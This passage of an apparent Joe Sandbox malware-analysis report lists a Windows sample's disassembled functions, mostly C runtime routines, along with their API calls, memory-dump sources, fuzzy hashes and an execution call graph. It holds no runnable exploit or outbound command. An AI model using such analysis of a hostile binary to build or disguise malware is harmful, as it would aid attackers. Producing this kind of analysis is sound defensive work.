                                                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 0040455B
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004044B9: __FF_MSGBANNER.LIBCMT ref: 004044D2
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004044B9: __NMSG_WRITE.LIBCMT ref: 004044D9
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004044B9: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00401921,00000000,00000001,00000000,?,00404785,00000018,005D5890,0000000C,00404815), ref: 004044FE
                                                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0040456E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocHeap_free_malloc
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2734353464-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 61bd32a45012f4549645fe48891dd8308e4f95b5e458f4dd8b53c8a68d482d80
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a2c5e14f3abab3b46456315dd7ab5dacecc649fa4160e809dee26b10f61197ba
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61bd32a45012f4549645fe48891dd8308e4f95b5e458f4dd8b53c8a68d482d80
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED11C4B25055117BCB313BB5BC05A5B3794ABC13A0F21853BFB08BB2E0DE3C8941969D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040605C Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00406068
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403FDD: __getptd_noexit.LIBCMT ref: 00403FE0
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403FDD: __amsg_exit.LIBCMT ref: 00403FED
                                                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040607F
                                                                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0040608D
                                                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040609D
                                                                                                                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 004060B1
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e5211ff83136d9507b2247b2a74555fc54ae9f480270c4925cb011943c06de8e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5e38fd5a7783f07dc4d44450aeaf55c1058efbae2ac8fa8ede39d4278c6af2c9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e5211ff83136d9507b2247b2a74555fc54ae9f480270c4925cb011943c06de8e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0F631A413149AD630FF799802B4E37A06F00329F12013FF506B72D2CB7C29109A5E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00402005 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ]$@2]
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3494438863-696408521
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d788793a4143e2976dff34cccf0d0af9fa94b85346b28f81e467cfb542c58a8f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 13879186c938b816cccb7c625f1de466437b846b3ba68b322c833f163aa339da
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d788793a4143e2976dff34cccf0d0af9fa94b85346b28f81e467cfb542c58a8f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B11043160531257E7349A1DBD4C7662BD5B799324B14423BE302EB3E0E6B8C882D248
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005CB9C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 005CB9EB
                                                                                                                                                                                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CB9F5
                                                                                                                                                                                                                                                                                                                                                                  • GetServiceKeyNameA.ADVAPI32(00000000,tokijotinelazusoforiyoruki,?,2958E117), ref: 005CBA1F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • tokijotinelazusoforiyoruki, xrefs: 005CBA18
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: NamePrivateProfileResourceServiceStringUpdateWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID: tokijotinelazusoforiyoruki
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2106879505-666090400
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d28d63d1975e20926047f6c6cf6b743d18ca73b661b14c93c2e538364fd9876c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a292765ebe76e924173564f9a3cee30b9e114d1feedb85776fb342c30718c7c3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d28d63d1975e20926047f6c6cf6b743d18ca73b661b14c93c2e538364fd9876c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC012B711412045AE3306F5CDD47F597F64F754B10F40061FE754AA1D1E77058448666
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0040C2D5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040C309
                                                                                                                                                                                                                                                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 0040C33C
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 0040C36D
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 0040C3DB
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e381b68ca43b2ca8e19911e7e9a364142e079a93569dd4c22e94d42cc7b28f61
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f79a345fd2c00daf73f727bc6b056d9c0055be0ebb95a4779142a6a20b339e70
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e381b68ca43b2ca8e19911e7e9a364142e079a93569dd4c22e94d42cc7b28f61
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1831A431910246EFDF20DFA4C8C096E3BA5AF01310F1486BEE861AB2D1D734DD51EB59
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 005CCC9B Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.2375220659.0000000000413000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375140253.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375220659.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2375979297.00000000005D3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376031599.00000000005D7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376080189.00000000005D8000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376151324.00000000005D9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.2376228703.00000000005E3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_572.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7659e4ef46eb3dc854fa885a691a500da997daefc6b5927b0d7f1199e0bd93e6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 843931e506ad9f7667999f9533ecfb8930c9daf0a1febf59d810d17d1cd26479
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10117B3200018EBFCF125EC8DD05DEE3F22BB59394B598419FA2D98031D332C9B2AB81
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                                                  Execution Coverage:24.6%
                                                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:223
                                                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                                                                                                                                                                                                                                                  execution_graph 1065 69c28c 1066 69c29e 1065->1066 1068 69c2ac @_EH4_CallFilterFunc@8 1065->1068 1067 694a78 __except_handler4 5 API calls 1066->1067 1067->1068 1069 6962b0 1070 6962e9 1069->1070 1071 6962dc 1069->1071 1073 694a78 __except_handler4 5 API calls 1070->1073 1072 694a78 __except_handler4 5 API calls 1071->1072 1072->1070 1080 6962f9 __except_handler4 __IsNonwritableInCurrentImage 1073->1080 1074 69637c 1075 69636c 1077 694a78 __except_handler4 5 API calls 1075->1077 1076 694a78 __except_handler4 5 API calls 1076->1075 1077->1074 1079 6963cb __except_handler4 1081 6963ff 1079->1081 1082 694a78 __except_handler4 5 API calls 1079->1082 1080->1074 1084 696352 __except_handler4 1080->1084 1085 69c31e RtlUnwind 1080->1085 1083 694a78 __except_handler4 5 API calls 1081->1083 1082->1081 1083->1084 1084->1074 1084->1075 1084->1076 1086 69c333 1085->1086 1086->1079 820 696b02 821 696b16 820->821 863 696c71 821->863 864 69d2c2 821->864 824 696c76 GetStdHandle 825 696c84 824->825 824->863 827 696c89 _strlen 825->827 825->863 826 69d2c2 __set_error_mode 31 API calls 828 696b49 826->828 830 696c9d WriteFile 827->830 828->824 829 696b5b 828->829 829->863 870 696155 829->870 830->863 833 696b91 GetModuleFileNameA 836 696baf 833->836 837 696bd5 _strlen 833->837 834 696b84 918 6943e0 834->918 839 696155 _strcpy_s 31 API calls 836->839 842 696c1a 837->842 925 69d20d 837->925 840 696bbf 839->840 840->837 841 696bc6 840->841 843 6943e0 __invoke_watson 10 API calls 841->843 879 69d199 842->879 845 696bd2 843->845 845->837 849 696c3c 853 69d199 _strcat_s 31 API calls 849->853 850 696c2f 852 6943e0 __invoke_watson 10 API calls 850->852 851 696c09 854 6943e0 __invoke_watson 10 API calls 851->854 855 696c39 852->855 856 696c4d 853->856 859 696c15 854->859 855->849 857 696c61 856->857 858 696c54 856->858 888 69d030 857->888 860 6943e0 __invoke_watson 10 API calls 858->860 859->842 862 696c5e 860->862 862->857 865 69d2d1 864->865 866 696b38 865->866 934 694a2f 865->934 866->824 866->826 871 69616d 870->871 872 696166 870->872 873 694a2f __dosmaperr 31 API calls 871->873 872->871 877 696193 872->877 874 696172 873->874 875 69452f _strcpy_s 6 API calls 874->875 876 696181 875->876 876->833 876->834 877->876 878 694a2f __dosmaperr 31 API calls 877->878 878->874 880 69d1b1 879->880 883 69d1aa 879->883 881 694a2f __dosmaperr 31 API calls 880->881 882 69d1b6 881->882 884 69452f _strcpy_s 6 API calls 882->884 883->880 885 69d1e5 883->885 886 696c28 884->886 885->886 887 694a2f __dosmaperr 31 API calls 885->887 886->849 886->850 887->882 1041 695716 888->1041 891 69d0e1 899 69571f __decode_pointer 6 API calls 891->899 913 69d105 891->913 892 69d053 LoadLibraryA 893 69d068 GetProcAddress 892->893 894 69d192 892->894 893->894 896 69d07e 893->896 894->863 895 69d130 897 69571f __decode_pointer 6 API calls 895->897 1044 6956a4 TlsGetValue 896->1044 901 69d17d 897->901 898 69571f __decode_pointer 6 API calls 910 69d148 898->910 902 69d0f8 899->902 901->894 904 69d182 MessageBoxA 901->904 905 69571f __decode_pointer 6 API calls 902->905 904->894 905->913 906 6956a4 __encode_pointer 6 API calls 907 69d099 GetProcAddress 906->907 908 6956a4 __encode_pointer 6 API calls 907->908 909 69d0ae GetProcAddress 908->909 911 6956a4 __encode_pointer 6 API calls 909->911 910->895 912 69571f __decode_pointer 6 API calls 910->912 914 69d0c3 911->914 912->895 913->895 913->898 914->891 915 69d0cd GetProcAddress 914->915 916 6956a4 __encode_pointer 6 API calls 915->916 917 69d0db 916->917 917->891 1054 696950 918->1054 920 69440d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 921 6944e9 GetCurrentProcess TerminateProcess 920->921 924 6944dd __invoke_watson 920->924 1056 694a78 921->1056 923 694506 923->833 924->921 929 69d21f 925->929 926 69d223 927 694a2f __dosmaperr 31 API calls 926->927 928 696c02 926->928 933 69d23f 927->933 928->842 928->851 929->926 929->928 931 69d269 929->931 930 69452f _strcpy_s 6 API calls 930->928 931->928 932 694a2f __dosmaperr 31 API calls 931->932 932->933 933->930 940 69592f GetLastError 934->940 936 694a34 937 69452f 936->937 938 69571f __decode_pointer 6 API calls 937->938 939 69453f __invoke_watson 938->939 954 6957ba TlsGetValue 940->954 943 69599c SetLastError 943->936 948 69597b 974 695848 948->974 949 695993 990 694a87 949->990 952 695983 GetCurrentThreadId 952->943 953 695999 953->943 955 6957ea 954->955 956 6957cf 954->956 955->943 959 696481 955->959 957 69571f __decode_pointer 6 API calls 956->957 958 6957da TlsSetValue 957->958 958->955 960 69648a 959->960 961 69595a 960->961 962 6964a8 Sleep 960->962 961->943 964 69571f TlsGetValue 961->964 963 6964bd 962->963 963->960 963->961 965 695758 GetModuleHandleW 964->965 966 695737 964->966 968 695768 965->968 969 695773 GetProcAddress 965->969 966->965 967 695741 TlsGetValue 966->967 972 69574c 967->972 1001 696610 968->1001 971 695750 969->971 971->948 971->949 972->965 972->971 1005 696254 974->1005 976 695854 GetModuleHandleW 977 69586b 976->977 978 695864 976->978 980 695882 GetProcAddress GetProcAddress 977->980 981 6958a6 977->981 979 696610 __crt_waiting_on_module_handle 2 API calls 978->979 982 69586a 979->982 980->981 983 6958c5 InterlockedIncrement 981->983 982->977 1006 69591d 983->1006 985 6958df 1009 69b255 InterlockedIncrement 985->1009 987 695904 1021 695926 987->1021 989 695911 __initptd 989->952 994 694a93 __endthreadex ___sbh_find_block 990->994 991 694ae7 RtlFreeHeap 992 694af9 991->992 996 694b0c __dosmaperr __initptd 991->996 993 694a2f __dosmaperr 29 API calls 992->993 995 694afe GetLastError 993->995 994->996 997 694ac4 994->997 1000 694ad2 994->1000 1026 699bfc 994->1026 995->996 996->953 1033 694add 997->1033 1000->991 1000->996 1002 69661b Sleep GetModuleHandleW 1001->1002 1003 696639 1002->1003 1004 69576e 1002->1004 1003->1002 1003->1004 1004->969 1004->971 1005->976 1024 699abf RtlLeaveCriticalSection 1006->1024 1008 695924 1008->985 1010 69b273 InterlockedIncrement 1009->1010 1011 69b276 1009->1011 1010->1011 1012 69b280 InterlockedIncrement 1011->1012 1013 69b283 1011->1013 1012->1013 1014 69b28d InterlockedIncrement 1013->1014 1015 69b290 1013->1015 1014->1015 1016 69b29a InterlockedIncrement 1015->1016 1018 69b29d 1015->1018 1016->1018 1017 69b2b6 InterlockedIncrement 1017->1018 1018->1017 1019 69b2d1 InterlockedIncrement 1018->1019 1020 69b2c6 InterlockedIncrement 1018->1020 1019->987 1020->1018 1025 699abf RtlLeaveCriticalSection 1021->1025 1023 69592d 1023->989 1024->1008 1025->1023 1027 699edd 1026->1027 1028 699c3b 1026->1028 1027->997 1028->1027 1029 699e27 VirtualFree 1028->1029 1030 699e8b 1029->1030 1030->1027 1031 699e9a VirtualFree HeapFree 1030->1031 1036 695df0 1031->1036 1040 699abf RtlLeaveCriticalSection 1033->1040 1035 694ae4 1035->1000 1038 695e08 1036->1038 1037 695e37 1037->1027 1038->1037 1039 695e2f __VEC_memcpy 1038->1039 1039->1037 1040->1035 1042 6956a4 __encode_pointer 6 API calls 1041->1042 1043 69571d 1042->1043 1043->891 1043->892 1045 6956dd GetModuleHandleW 1044->1045 1046 6956bc 1044->1046 1048 6956f8 GetProcAddress 1045->1048 1049 6956ed 1045->1049 1046->1045 1047 6956c6 TlsGetValue 1046->1047 1052 6956d1 1047->1052 1051 6956d5 GetProcAddress 1048->1051 1050 696610 __crt_waiting_on_module_handle 2 API calls 1049->1050 1053 6956f3 1050->1053 1051->906 1052->1045 1052->1051 1053->1048 1053->1051 1055 69695c __VEC_memzero 1054->1055 1055->920 1057 694a80 1056->1057 1058 694a82 IsDebuggerPresent 1056->1058 1057->923 1064 696948 1058->1064 1061 6999e4 SetUnhandledExceptionFilter UnhandledExceptionFilter 1062 699a09 GetCurrentProcess TerminateProcess 1061->1062 1063 699a01 __invoke_watson 1061->1063 1062->923 1063->1062 1064->1061

                                                                                                                                                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                                                                                                                                                  • Disassembly available
